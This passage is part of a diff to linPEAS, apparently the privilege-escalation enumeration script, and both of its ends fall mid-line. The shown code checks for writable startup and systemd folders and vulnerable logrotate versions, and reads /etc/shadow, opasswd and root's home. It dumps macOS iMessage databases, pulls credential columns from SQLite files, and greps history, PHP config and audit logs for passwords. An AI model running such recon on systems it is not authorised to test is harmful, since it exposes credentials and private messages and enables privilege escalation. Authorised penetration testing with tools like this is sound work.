'(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ -w "/etc/rc.d/init.d" ]; then echo "You have write privileges over /etc/rc.d/init.d" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /etc/rc.d/init.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/rc.d/init.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ -w "/usr/local/etc/rc.d" ]; then echo "You have write privileges over /usr/local/etc/rc.d" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /usr/local/etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /usr/local/etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ -w "/etc/rc.d" ]; then echo "You have write privileges over /etc/rc.d" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ -w "/etc/systemd/" ]; then echo "You have write privileges over /etc/systemd/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /etc/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ -w "/lib/systemd/" ]; then echo "You have write privileges over /lib/systemd/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /lib/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /lib/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi +##-- IF) Modified interesting files into specific folders in the last 5mins +print_2title "Modified interesting files in the last 5mins (limit 100)" +find / -type f -mmin -5 ! -path "/proc/*" ! -path "/sys/*" ! -path "/run/*" ! -path "/dev/*" ! -path "/var/lib/*" ! -path "/private/var/*" 2>/dev/null | grep -v "/linpeas" | head -n 100 | sed -${E} "s,$Wfolders,${SED_RED}," +echo "" + +##-- IF) Writable log files +print_2title "Writable log files (logrotten) (limit 100)" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#logrotate-exploitation" +logrotate --version 2>/dev/null || echo_not_found "logrotate" +lastWlogFolder="ImPOsSiBleeElastWlogFolder" +logfind=$(find / -type f -name "*.log" -o -name "*.log.*" 2>/dev/null | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 3){ print line_init; }; if (cont == "3"){print "#)You_can_write_more_log_files_inside_last_directory"}; pre=act}' | head -n 100) +printf "%s\n" "$logfind" | while read log; do + if ! [ "$IAMROOT" ] && [ "$log" ] && [ -w "$log" ] || ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders"; then #Only print info if something interesting found + if echo "$log" | grep -q "You_can_write_more_log_files_inside_last_directory"; then printf $ITALIC"$log\n"$NC; + elif ! [ "$IAMROOT" ] && [ -w "$log" ] && [ "$(command -v logrotate 2>/dev/null)" ] && logrotate --version 2>&1 | grep -qE ' 1| 2| 3.1'; then printf "Writable:$RED $log\n"$NC; #Check vuln version of logrotate is used and print red in that case + elif ! [ "$IAMROOT" ] && [ -w "$log" ]; then echo "Writable: $log"; + elif ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders" && [ "$log" ] && [ ! "$lastWlogFolder" == "$log" ]; then lastWlogFolder="$log"; echo "Writable folder: $log" | sed -${E} "s,$Wfolders,${SED_RED},g"; + fi fi +done + +echo "" + +##-- IF) Files inside my home +print_2title "Files inside $HOME (limit 20)" +(ls -la $HOME 2>/dev/null | head -n 23) || echo_not_found +echo "" + +##-- IF) Files inside /home +print_2title "Files inside others home (limit 20)" +(find $HOMESEARCH -type f 2>/dev/null | grep -v -i "/"$USER | head -n 20) || echo_not_found +echo "" + +##-- IF) Mail applications +print_2title "Searching installed mail applications" +ls /bin /sbin /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin /etc 2>/dev/null | grep -Ewi "$mail_apps" +echo "" + +##-- IF) Mails +print_2title "Mails (limit 50)" +(find /var/mail/ /var/spool/mail/ /private/var/mail -type f -ls 2>/dev/null | head -n 50 | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_RED},g" | sed "s,root,${SED_GREEN},g") || echo_not_found +echo "" + +##-- IF) Backup folders +print_2title "Backup folders" +printf "%s\n" "$backup_folders" | while read b ; do + ls -ld "$b" 2> /dev/null | sed -${E} "s,backups|backup,${SED_RED},g"; + ls -l "$b" 2>/dev/null && echo "" +done +echo "" + +##-- IF) Backup files +print_2title "Backup files (limited 100)" +backs=$(find / -type f \( -name "*backup*" -o -name "*\.bak" -o -name "*\.bak\.*" -o -name "*\.bck" -o -name "*\.bck\.*" -o -name "*\.bk" -o -name "*\.bk\.*" -o -name "*\.old" -o -name "*\.old\.*" \) -not -path "/proc/*" 2>/dev/null) +printf "%s\n" "$backs" | head -n 100 | while read b ; do + if [ -r "$b" ]; then + ls -l "$b" | grep -Ev "$notBackup" | grep -Ev "$notExtensions" | sed -${E} "s,backup|bck|\.bak|\.old,${SED_RED},g"; + fi; +done +echo "" + +##-- IF) DB files +if [ "$MACPEAS" ]; then + print_2title "Reading messages database" + sqlite3 $HOME/Library/Messages/chat.db 'select * from message' 2>/dev/null + sqlite3 $HOME/Library/Messages/chat.db 'select * from attachment' 2>/dev/null + sqlite3 $HOME/Library/Messages/chat.db 'select * from deleted_messages' 2>/dev/null + +fi +print_2title "Searching tables inside readable .db/.sql/.sqlite files (limit 100)" +FILECMD="$(command -v file 2>/dev/null)" +if [ "$PSTORAGE_DATABASE" ]; then + printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do + if [ "$FILECMD" ]; then + echo "Found: $(file $f)" | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g"; + else + echo "Found: $f" | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g"; + fi + done + SQLITEPYTHON="" echo "" - - ##-- IF) Hashes in passwd file - print_list "Hashes inside passwd file? ........... " - if grep -qv '^[^:]*:[x\*\!]\|^#\|^$' /etc/passwd /etc/master.passwd /etc/group 2>/dev/null; then grep -v '^[^:]*:[x\*]\|^#\|^$' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - - ##-- IF) Writable in passwd file - print_list "Writable passwd file? ................ " - if [ -w "/etc/passwd" ]; then echo "/etc/passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," - elif [ -w "/etc/pwd.db" ]; then echo "/etc/pwd.db is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," - elif [ -w "/etc/master.passwd" ]; then echo "/etc/master.passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," - else echo_no - fi - - ##-- IF) Credentials in fstab - print_list "Credentials in fstab/mtab? ........... " - if grep -qE "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null; then grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - - ##-- IF) Read shadow files - print_list "Can I read shadow files? ............. " - if [ "$(cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null)" ]; then cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - - print_list "Can I read shadow plists? ............ " - possible_check="" - (for l in /var/db/dslocal/nodes/Default/users/*; do if [ -r "$l" ];then echo "$l"; defaults read "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ]; then echo_no; fi) 2>/dev/null || echo_no - - print_list "Can I write shadow plists? ........... " - possible_check="" - (for l in /var/db/dslocal/nodes/Default/users/*; do if [ -w "$l" ];then echo "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ]; then echo_no; fi) 2>/dev/null || echo_no - - ##-- IF) Read opasswd file - print_list "Can I read opasswd file? ............. " - if [ -r "/etc/security/opasswd" ]; then cat /etc/security/opasswd 2>/dev/null || echo "" - else echo_no - fi - - ##-- IF) network-scripts - print_list "Can I write in network-scripts? ...... " - if ! [ "$IAMROOT" ] && [ -w "/etc/sysconfig/network-scripts/" ]; then echo "You have write privileges on /etc/sysconfig/network-scripts/" | sed -${E} "s,.*,${SED_RED_YELLOW}," - elif [ "$(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges on $(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW}," - else echo_no - fi - - ##-- IF) Read root dir - print_list "Can I read root folder? .............. " - (ls -al /root/ 2>/dev/null | grep -vi "total 0") || echo_no - echo "" - - ##-- IF) Root files in home dirs - print_2title "Searching root files in home dirs (limit 30)" - (find $HOMESEARCH /Users -user root 2>/dev/null | head -n 30 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_RED},") || echo_not_found - echo "" - - ##-- IF) Others files in my dirs - if ! [ "$IAMROOT" ]; then - print_2title "Searching folders owned by me containing others files on it (limit 100)" - (find / -type d -user "$USER" ! -path "/proc/*" 2>/dev/null | head -n 100 | while read d; do find "$d" -maxdepth 1 ! -user "$USER" \( -type f -or -type d \) -exec dirname {} \; 2>/dev/null; done) | sort | uniq | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${C}[1;13m&${C}[0m,g" - echo "" - fi - - ##-- IF) Readable files belonging to root and not world readable - if ! [ "$IAMROOT" ]; then - print_2title "Readable files belonging to root and readable by me but not world readable" - (find / -type f -user root ! -perm -o=r 2>/dev/null | grep -v "\.journal" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null | sed -${E} "s,/.*,${SED_RED},"; fi; done) || echo_not_found - echo "" - fi - - ##-- IF) Modified interesting files into specific folders in the last 5mins - print_2title "Modified interesting files in the last 5mins (limit 100)" - find / -type f -mmin -5 ! -path "/proc/*" ! -path "/sys/*" ! -path "/run/*" ! -path "/dev/*" ! -path "/var/lib/*" ! -path "/private/var/*" 2>/dev/null | grep -v "/linpeas" | head -n 100 | sed -${E} "s,$Wfolders,${SED_RED}," - echo "" - - ##-- IF) Writable log files - print_2title "Writable log files (logrotten) (limit 100)" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#logrotate-exploitation" - logrotate --version 2>/dev/null || echo_not_found "logrotate" - lastWlogFolder="ImPOsSiBleeElastWlogFolder" - logfind=$(find / -type f -name "*.log" -o -name "*.log.*" 2>/dev/null | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 3){ print line_init; }; if (cont == "3"){print "#)You_can_write_more_log_files_inside_last_directory"}; pre=act}' | head -n 100) - printf "%s\n" "$logfind" | while read log; do - if ! [ "$IAMROOT" ] && [ "$log" ] && [ -w "$log" ] || ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders"; then #Only print info if something interesting found - if echo "$log" | grep -q "You_can_write_more_log_files_inside_last_directory"; then printf $ITALIC"$log\n"$NC; - elif ! [ "$IAMROOT" ] && [ -w "$log" ] && [ "$(command -v logrotate 2>/dev/null)" ] && logrotate --version 2>&1 | grep -qE ' 1| 2| 3.1'; then printf "Writable:$RED $log\n"$NC; #Check vuln version of logrotate is used and print red in that case - elif ! [ "$IAMROOT" ] && [ -w "$log" ]; then echo "Writable: $log"; - elif ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders" && [ "$log" ] && [ ! "$lastWlogFolder" == "$log" ]; then lastWlogFolder="$log"; echo "Writable folder: $log" | sed -${E} "s,$Wfolders,${SED_RED},g"; + printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do + if ([ -r "$f" ] && [ "$FILECMD" ] && file "$f" | grep -qi sqlite) || ([ -r "$f" ] && [ ! "$FILECMD" ]); then #If readable and filecmd and sqlite, or readable and not filecmd + if [ "$(command -v sqlite3 2>/dev/null)" ]; then + tables=$(sqlite3 $f ".tables" 2>/dev/null) + #printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g" + elif [ "$(command -v python 2>/dev/null)" ] || [ "$(command -v python3 2>/dev/null)" ]; then + SQLITEPYTHON=$(command -v python 2>/dev/null || command -v python3 2>/dev/null) + tables=$($SQLITEPYTHON -c "print('\n'.join([t[0] for t in __import__('sqlite3').connect('$f').cursor().execute('SELECT name FROM sqlite_master WHERE type=\'table\' and tbl_name NOT like \'sqlite_%\';').fetchall()]))" 2>/dev/null) + #printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g" + else + tables="" + fi + if [ "$tables" ] || [ "$DEBUG" ]; then + printf $GREEN" -> Extracting tables from$NC $f $DG(limit 20)\n"$NC + printf "%s\n" "$tables" | while read t; do + columns="" + # Search for credentials inside the table using sqlite3 + if [ -z "$SQLITEPYTHON" ]; then + columns=$(sqlite3 $f ".schema $t" 2>/dev/null | grep "CREATE TABLE") + # Search for credentials inside the table using python + else + columns=$($SQLITEPYTHON -c "print(__import__('sqlite3').connect('$f').cursor().execute('SELECT sql FROM sqlite_master WHERE type!=\'meta\' AND sql NOT NULL AND name =\'$t\';').fetchall()[0][0])" 2>/dev/null) + fi + #Check found columns for interesting fields + INTCOLUMN=$(echo "$columns" | grep -i "username\|passw\|credential\|email\|hash\|salt") + if [ "$INTCOLUMN" ]; then + printf ${BLUE}" --> Found interesting column names in$NC $t $DG(output limit 10)\n"$NC | sed -${E} "s,user.*|credential.*,${SED_RED},g" + printf "$columns\n" | sed -${E} "s,username|passw|credential|email|hash|salt|$t,${SED_RED},g" + (sqlite3 $f "select * from $t" || $SQLITEPYTHON -c "print(', '.join([str(x) for x in __import__('sqlite3').connect('$f').cursor().execute('SELECT * FROM \'$t\';').fetchall()[0]]))") 2>/dev/null | head + fi + echo "" + done fi fi done +fi +echo "" - echo "" +if [ "$MACPEAS" ]; then + print_2title "Downloaded Files" + sqlite3 ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2 'select LSQuarantineAgentName, LSQuarantineDataURLString, LSQuarantineOriginURLString, date(LSQuarantineTimeStamp + 978307200, "unixepoch") as downloadedDate from LSQuarantineEvent order by LSQuarantineTimeStamp' | sort | grep -Ev "\|\|\|" +fi - ##-- IF) Files inside my home - print_2title "Files inside $HOME (limit 20)" - (ls -la $HOME 2>/dev/null | head -n 23) || echo_not_found - echo "" +##-- IF) Web files +print_2title "Web files?(output limit)" +ls -alhR /var/www/ 2>/dev/null | head +ls -alhR /srv/www/htdocs/ 2>/dev/null | head +ls -alhR /usr/local/www/apache22/data/ 2>/dev/null | head +ls -alhR /opt/lampp/htdocs/ 2>/dev/null | head +echo "" - ##-- IF) Files inside /home - print_2title "Files inside others home (limit 20)" - (find $HOMESEARCH /Users -type f 2>/dev/null | grep -v -i "/"$USER | head -n 20) || echo_not_found - echo "" +##-- IF) All hidden files +print_2title "All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)" +find / -type f -iname ".*" ! -path "/sys/*" ! -path "/System/*" ! -path "/private/var/*" -exec ls -l {} \; 2>/dev/null | grep -Ev "$INT_HIDDEN_FILES" | grep -Ev "_history$|\.gitignore|.npmignore|\.listing|\.ignore|\.uuid|\.depend|\.placeholder|\.gitkeep|\.keep|\.keepme" | head -n 70 +echo "" - ##-- IF) Mail applications - print_2title "Searching installed mail applications" - ls /bin /sbin /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin /etc 2>/dev/null | grep -Ewi "$mail_apps" - echo "" +##-- IF) Readable files in /tmp, /var/tmp, bachups +print_2title "Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)" +filstmpback=$(find /tmp /var/tmp /private/tmp /private/var/at/tmp /private/var/tmp $backup_folders_row -type f 2>/dev/null | head -n 70) +printf "%s\n" "$filstmpback" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null; fi; done +echo "" - ##-- IF) Mails - print_2title "Mails (limit 50)" - (find /var/mail/ /var/spool/mail/ /private/var/mail -type f -ls 2>/dev/null | head -n 50 | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_RED},g" | sed "s,root,${SED_GREEN},g") || echo_not_found - echo "" - - ##-- IF) Backup folders - print_2title "Backup folders" - printf "%s\n" "$backup_folders" | while read b ; do - ls -ld "$b" 2> /dev/null | sed -${E} "s,backups|backup,${SED_RED},g"; - ls -l "$b" 2>/dev/null && echo "" +##-- IF) Interesting writable files by ownership or all +if ! [ "$IAMROOT" ]; then + print_2title "Interesting writable files owned by me or writable by everyone (not in Home) (max 500)" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files" + #In the next file, you need to specify type "d" and "f" to avoid fake link files apparently writable by all + obmowbe=$(find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | sort | uniq | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500) + printf "%s\n" "$obmowbe" | while read entry; do + if echo "$entry" | grep -q "You_can_write_even_more_files_inside_last_directory"; then printf $ITALIC"$entry\n"$NC; + elif echo "$entry" | grep -qE "$writeVB"; then + echo "$entry" | sed -${E} "s,$writeVB,${SED_RED_YELLOW}," + else + echo "$entry" | sed -${E} "s,$writeB,${SED_RED}," + fi done echo "" +fi - ##-- IF) Backup files - print_2title "Backup files (limited 100)" - backs=$(find / -type f \( -name "*backup*" -o -name "*\.bak" -o -name "*\.bak\.*" -o -name "*\.bck" -o -name "*\.bck\.*" -o -name "*\.bk" -o -name "*\.bk\.*" -o -name "*\.old" -o -name "*\.old\.*" \) -not -path "/proc/*" 2>/dev/null) - printf "%s\n" "$backs" | head -n 100 | while read b ; do - if [ -r "$b" ]; then - ls -l "$b" | grep -Ev "$notBackup" | grep -Ev "$notExtensions" | sed -${E} "s,backup|bck|\.bak|\.old,${SED_RED},g"; - fi; - done - echo "" - - ##-- IF) DB files - if [ "$MACPEAS" ]; then - print_2title "Reading messages database" - sqlite3 $HOME/Library/Messages/chat.db 'select * from message' 2>/dev/null - sqlite3 $HOME/Library/Messages/chat.db 'select * from attachment' 2>/dev/null - sqlite3 $HOME/Library/Messages/chat.db 'select * from deleted_messages' 2>/dev/null - - fi - print_2title "Searching tables inside readable .db/.sql/.sqlite files (limit 100)" - FILECMD="$(command -v file 2>/dev/null)" - if [ "$PSTORAGE_DATABASE" ]; then - printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do - if [ "$FILECMD" ]; then - echo "Found: $(file $f)" | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g"; - else - echo "Found: $f" | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g"; - fi - done - SQLITEPYTHON="" - echo "" - printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do - if ([ -r "$f" ] && [ "$FILECMD" ] && file "$f" | grep -qi sqlite) || ([ -r "$f" ] && [ ! "$FILECMD" ]); then #If readable and filecmd and sqlite, or readable and not filecmd - printf $GREEN" -> Extracting tables from$NC $f $DG(limit 20)\n"$NC - if [ "$(command -v sqlite3 2>/dev/null)" ]; then - tables=$(sqlite3 $f ".tables" 2>/dev/null) - #printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g" - elif [ "$(command -v python 2>/dev/null)" ] || [ "$(command -v python3 2>/dev/null)" ]; then - SQLITEPYTHON=$(command -v python 2>/dev/null || command -v python3 2>/dev/null) - tables=$($SQLITEPYTHON -c "print('\n'.join([t[0] for t in __import__('sqlite3').connect('$f').cursor().execute('SELECT name FROM sqlite_master WHERE type=\'table\' and tbl_name NOT like \'sqlite_%\';').fetchall()]))" 2>/dev/null) - #printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g" - else - tables="" - fi - if [ "$tables" ]; then - printf "%s\n" "$tables" | while read t; do - columns="" - # Search for credentials inside the table using sqlite3 - if [ -z "$SQLITEPYTHON" ]; then - columns=$(sqlite3 $f ".schema $t" 2>/dev/null | grep "CREATE TABLE") - # Search for credentials inside the table using python - else - columns=$($SQLITEPYTHON -c "print(__import__('sqlite3').connect('$f').cursor().execute('SELECT sql FROM sqlite_master WHERE type!=\'meta\' AND sql NOT NULL AND name =\'$t\';').fetchall()[0][0])" 2>/dev/null) - fi - #Check found columns for interesting fields - INTCOLUMN=$(echo "$columns" | grep -i "username\|passw\|credential\|email\|hash\|salt") - if [ "$INTCOLUMN" ]; then - printf ${BLUE}" --> Found interesting column names in$NC $t $DG(output limit 10)\n"$NC | sed -${E} "s,user.*|credential.*,${SED_RED},g" - printf "$columns\n" | sed -${E} "s,username|passw|credential|email|hash|salt|$t,${SED_RED},g" - (sqlite3 $f "select * from $t" || $SQLITEPYTHON -c "print(', '.join([str(x) for x in __import__('sqlite3').connect('$f').cursor().execute('SELECT * FROM \'$t\';').fetchall()[0]]))") 2>/dev/null | head - fi - done - echo "" - fi - fi - done - fi - echo "" - - if [ "$MACPEAS" ]; then - print_2title "Downloaded Files" - sqlite3 ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2 'select LSQuarantineAgentName, LSQuarantineDataURLString, LSQuarantineOriginURLString, date(LSQuarantineTimeStamp + 978307200, "unixepoch") as downloadedDate from LSQuarantineEvent order by LSQuarantineTimeStamp' | sort | grep -Ev "\|\|\|" - fi - - ##-- IF) Web files - print_2title "Web files?(output limit)" - ls -alhR /var/www/ 2>/dev/null | head - ls -alhR /srv/www/htdocs/ 2>/dev/null | head - ls -alhR /usr/local/www/apache22/data/ 2>/dev/null | head - ls -alhR /opt/lampp/htdocs/ 2>/dev/null | head - echo "" - - ##-- IF) All hidden files - print_2title "All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)" - find / -type f -iname ".*" ! -path "/sys/*" ! -path "/System/*" ! -path "/private/var/*" -exec ls -l {} \; 2>/dev/null | grep -Ev "$INT_HIDDEN_FILES" | grep -Ev "_history$|\.gitignore|.npmignore|\.listing|\.ignore|\.uuid|\.depend|\.placeholder|\.gitkeep|\.keep|\.keepme" | head -n 70 - echo "" - - ##-- IF) Readable files in /tmp, /var/tmp, bachups - print_2title "Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)" - filstmpback=$(find /tmp /var/tmp /private/tmp /private/var/at/tmp /private/var/tmp $backup_folders_row -type f 2>/dev/null | head -n 70) - printf "%s\n" "$filstmpback" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null; fi; done - echo "" - - ##-- IF) Interesting writable files by ownership or all - if ! [ "$IAMROOT" ]; then - print_2title "Interesting writable files owned by me or writable by everyone (not in Home) (max 500)" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files" - #In the next file, you need to specify type "d" and "f" to avoid fake link files apparently writable by all - obmowbe=$(find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | sort | uniq | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500) - printf "%s\n" "$obmowbe" | while read entry; do - if echo "$entry" | grep -q "You_can_write_even_more_files_inside_last_directory"; then printf $ITALIC"$entry\n"$NC; - elif echo "$entry" | grep -qE "$writeVB"; then - echo "$entry" | sed -${E} "s,$writeVB,${SED_RED_YELLOW}," - else - echo "$entry" | sed -${E} "s,$writeB,${SED_RED}," - fi - done - echo "" - fi - - ##-- IF) Interesting writable files by group - if ! [ "$IAMROOT" ]; then - print_2title "Interesting GROUP writable files (not in Home) (max 500)" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files" - for g in $(groups); do +##-- IF) Interesting writable files by group +if ! [ "$IAMROOT" ]; then + print_2title "Interesting GROUP writable files (not in Home) (max 500)" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files" + for g in $(groups); do + iwfbg=$(find / '(' -type f -or -type d ')' -group $g -perm -g=w ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500) + if [ "$iwfbg" ] || [ "$DEBUG" ]; then printf " Group $GREEN$g:\n$NC"; - iwfbg=$(find / '(' -type f -or -type d ')' -group $g -perm -g=w ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500) printf "%s\n" "$iwfbg" | while read entry; do if echo "$entry" | grep -q "You_can_write_even_more_files_inside_last_directory"; then printf $ITALIC"$entry\n"$NC; elif echo "$entry" | grep -Eq "$writeVB"; then @@ -3736,111 +3970,686 @@ if echo $CHECKS | grep -q IntFiles; then echo "$entry" | sed -${E} "s,$writeB,${SED_RED}," fi done - done - echo "" - fi + fi + done + echo "" +fi - ##-- IF) Passwords in config PHP files +##-- IF) Passwords in history files +if [ "$PSTORAGE_HISTORY" ] || [ "$DEBUG" ]; then + print_2title "Searching passwords in history files" + printf "%s\n" "$PSTORAGE_HISTORY" | while read f; do grep -Ei "$pwd_inside_history" "$f" 2>/dev/null | sed -${E} "s,$pwd_inside_history,${SED_RED},"; done + echo "" +fi + +##-- IF) Passwords in config PHP files +if [ "$PSTORAGE_PHP_FILES" ] || [ "$DEBUG" ]; then print_2title "Searching passwords in config PHP files" printf "%s\n" "$PSTORAGE_PHP_FILES" | while read c; do grep -EiI "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" "$c" 2>/dev/null | grep -Ev "function|password.*= ?\"\"|password.*= ?''" | sed '/^.\{150\}./d' | sort | uniq | sed -${E} "s,[pP][aA][sS][sS][wW]|[dD][bB]_[pP][aA][sS][sS],${SED_RED},g"; done echo "" +fi - ##-- IF) TTY passwords - print_2title "Checking for TTY (sudo/su) passwords in audit logs" - aureport --tty 2>/dev/null | grep -E "su |sudo " | sed -${E} "s,su|sudo,${SED_RED},g" - find /var/log/ -type f -exec grep -RE 'comm="su"|comm="sudo"' '{}' \; 2>/dev/null | sed -${E} 